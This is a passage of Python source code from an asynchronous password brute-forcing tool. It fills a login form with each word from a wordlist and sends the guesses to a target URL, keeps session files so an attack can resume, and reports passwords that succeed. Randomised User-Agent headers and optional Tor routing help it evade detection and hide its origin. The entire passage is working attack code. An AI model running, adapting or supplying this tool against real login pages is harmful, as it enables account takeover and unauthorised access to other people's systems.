open it and read, as it should. with open(fn, "rb") as f: _data = f.read() # Read data from file, decode it from BinaryBuffer to String. lines = [x.decode() for x in _data.split(b"\n")] # Finally, add each line to old_passwords set. for line in lines: if line != "": self.old_passwds.add(line) # Define the session name as the restore file used. self.session_name = os.path.basename(fn) return True else: return False def _search_open_sesssion(self): current_dir = os.getcwd() + os.sep for root, dirc, files in os.walk(current_dir): for f in files: if f.endswith(".restore"): file_path = os.path.join(root, f) self.restore_files.append(file_path) return len(self.restore_files) @staticmethod def _generate_session_name(): _id = hex(random.randint(0, 999999)) return "session_{0}.restore".format(_id[2:]) @staticmethod def _generate_payload_type(user_input): """ Function responsible for transforming String type into Dictionary type :param user_input: str :return: d: dict """ d = dict() p = [x.strip() for x in user_input.split(",")] for element in p: key, value = element.split(":") d[key] = value return d @staticmethod def _encode_payload_www(unencoded_payload): """ Function responsible for transforming a dictionary payload into x-www-form-urlencoded payload :param unencoded_payload: :return: """ pl = str() dict_len = len(unencoded_payload) i = 1 for key in unencoded_payload: if i != dict_len: pl += "{0}={1}&".format(key, unencoded_payload[key]) else: pl += "{0}={1}".format(key, unencoded_payload[key]) i += 1 return pl def _adjust_payload(self, payload, password=None, login=None): """ Creates a copy from payload supplied by user, then formats it with attack data. :param password: String :return: tmp_payload: String """ tmp_payload = copy(payload) for key in tmp_payload: value = tmp_payload[key] if value.upper() == "PASS": # Modify the payload prototype with the queue's password. if password is not None: tmp_payload[key] = password elif value.upper() == "LOGIN": # Modify the payload prototype with the supplied login if login is not None: tmp_payload[key] = login else: continue return tmp_payload @staticmethod def _store_data(fn, data): """ Stores buffer of data into a file and adds a new line at the end of it. :param fn: String => Filename for a file :param data: String => Data buffer :return: None """ data += "\n" with open(fn, "a") as f: f.write(data) return def _increment_progress_bar(self): """ Check if one second has passed since last report, then renewal the progress bar with current attack progress :return: None """ if (time.time() - self.last_report_time) < 1: return self.last_report_time = time.time() self.progress_bar.update((self.max_passwords - self.loaded_passwords) + self.tried_passwords) def _parse_response(self, status, response_url, passwd): """ Parses the response packet based on http status code and response URL :param status: Integer => HTTP status code :param response_url: String => Request URL response :param passwd: String => Password that originated this response :return: None """ for error_string in self.error_string: if type(response_url is yarl.URL): response_url = response_url.query_string if error_string in response_url: self.tried_passwords += 1 self.runned_passwords.add(passwd) if len(self.runned_passwords) % 100 == 0: [self._store_data(self.session_name, x) for x in self.runned_passwords] self.runned_passwords.clear() return if status == 200: print("\n[+] Password was found: {0}".format(passwd)) print("[*] Response URL: {0}".format(response_url)) self._store_data("correct.pass", passwd) self._store_data("correct.pass", "{0}\n\n".format(self.payload)) self.found.set() return async def pre_page_request(self, session): # Use tor or not if self.tor_use is True: proxy_addr = self.tor_address else: proxy_addr = None # We will always create new headers for you, dear sysadmin... headers = { "content-type": "application/x-www-form-urlencoded", "User-Agent": random.choice(self.ua), } # Generate the payload custom_payload = self._adjust_payload(self.pre_payload, login=self.login) # Do the first request. async with session.post(self.pre_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response: status, response_url = response.status, response.url if status == 200: return 0, headers else: return 1, headers async def attack_this(self, session, password, headers=None): """ Perform IO operation for http request :param password: String => Password used in the attack :return: None """ if self.debug: print("Started attack!") # We need a header if not previously; if headers is None: headers = { "content-type": "application/x-www-form-urlencoded", "User-Agent": random.choice(self.ua), } custom_payload = self._adjust_payload(self.payload, password=password) # AsyncTimeout removed since commit c47781f # with async_timeout.timeout(10): if self.tor_use is True: proxy_addr = self.tor_address else: proxy_addr = None async with session.post(self.attack_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response: status, response_url = response.status, response.url self._parse_response(status, response_url, password) if self.debug is False: self._increment_progress_bar() if self.debug: print("Ended attack! [{0}] - Status: {1} - URL: {2}".format(password, status, response_url)) return def _parse_wordlist(self, iterable): return list(filter(lambda x: x not in self.old_passwds, iterable)) def _read_wordlist(self): tmp_list = [] with open(self.wordlist, "r") as f: for line in f.readlines(): tmp_list.append(line.replace("\n", "")) parsed_list = self._parse_wordlist(tmp_list) for element in parsed_list: self.queue.put_nowait(element) self.max_passwords = len(tmp_list) self.loaded_passwords = len(parsed_list) return len(parsed_list) def _generate_new_session(self, loop): # Create cookie jar jar = aiohttp.CookieJar(unsafe=True) # Adjust session object and tor usage information if self.tor_use is True: #print("[+] Using tor with address {0}\n".format(self.tor_address_string)) conn = get_tor_connector(self.tor_address_string) session = aiohttp.ClientSession(loop=loop, cookie_jar=jar, connector=conn) else: session = aiohttp.ClientSession(loop=loop, cookie_jar=jar) return session @asyncio.coroutine def work(self, loop): while not self.queue.empty(): # Create new aiohttp session session = self._generate_new_session(loop) # Check if password is found and throw queue away if self.found.is_set(): # noinspection PyProtectedMember for _ in range(len(self.queue._queue)): yield from self.queue.get() # Retrieve passwords from queue and test them password = yield from self.queue.get() # Do the request and deal with timeout try: k, headers = yield from self.pre_page_request(session) if k == 0: yield from self.attack_this(session, password, headers=headers) except Exception as e: if self.debug: print("Password '{0}' request timed out.".format(password)) print("Error: {0}\n".format(e)) self.queue.put_nowait(password) pass session.close() self.queue.task_done() @asyncio.coroutine def initiate(self, loop): # Attack preparation phase if self.debug: print("Started initiation!") pass_number = self._read_wordlist() print("\n[*] Program have read {0} passwords.\n".format(pass_number)) # Graphical visualization of attack status self.progress_bar = ProgressBar(widgets= ["Guesses: ", Counter(), "/", str(self.max_passwords), " [", Percentage(), "] ", Bar(marker="#"), " ", AdaptiveETA()], maxval=self.max_passwords).start() self.progress_bar.update(self.max_passwords - pass_number) # Now the code to run the tasks and execute the async requests workers = [asyncio.Task(self.work(loop)) for _ in range(self.max_tasks)] yield from self.queue.join() for w in workers: w.cancel() if self.debug: print("Ended initiation!")